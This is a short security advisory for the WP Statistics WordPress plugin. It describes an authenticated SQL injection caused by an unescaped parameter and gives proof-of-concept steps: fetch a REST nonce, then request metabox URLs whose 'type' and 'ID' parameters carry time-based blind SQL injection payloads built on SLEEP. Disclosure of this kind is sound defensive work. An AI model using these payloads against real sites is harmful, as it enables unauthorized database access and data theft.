The plugin does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+), however the plugin has a settings to allow low privilege users to access it as well.
Log in as a user allowed to View WP Statistic (by default admins, but this can be changed in Statistic > Settings > Roles) and get a nonce via https://a.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URLs below, which will result in a 6s delay https://a.com/wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name;=pages-chart&ago;=1&type;=a' AND (SELECT 42 FROM (SELECT(SLEEP(2)))Ab)–%20Cd https://a.com/wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name;=pages-chart&ago;=1&ID;=1 AND (SELECT 42 FROM (SELECT(SLEEP(2)))Ab)–%20Cd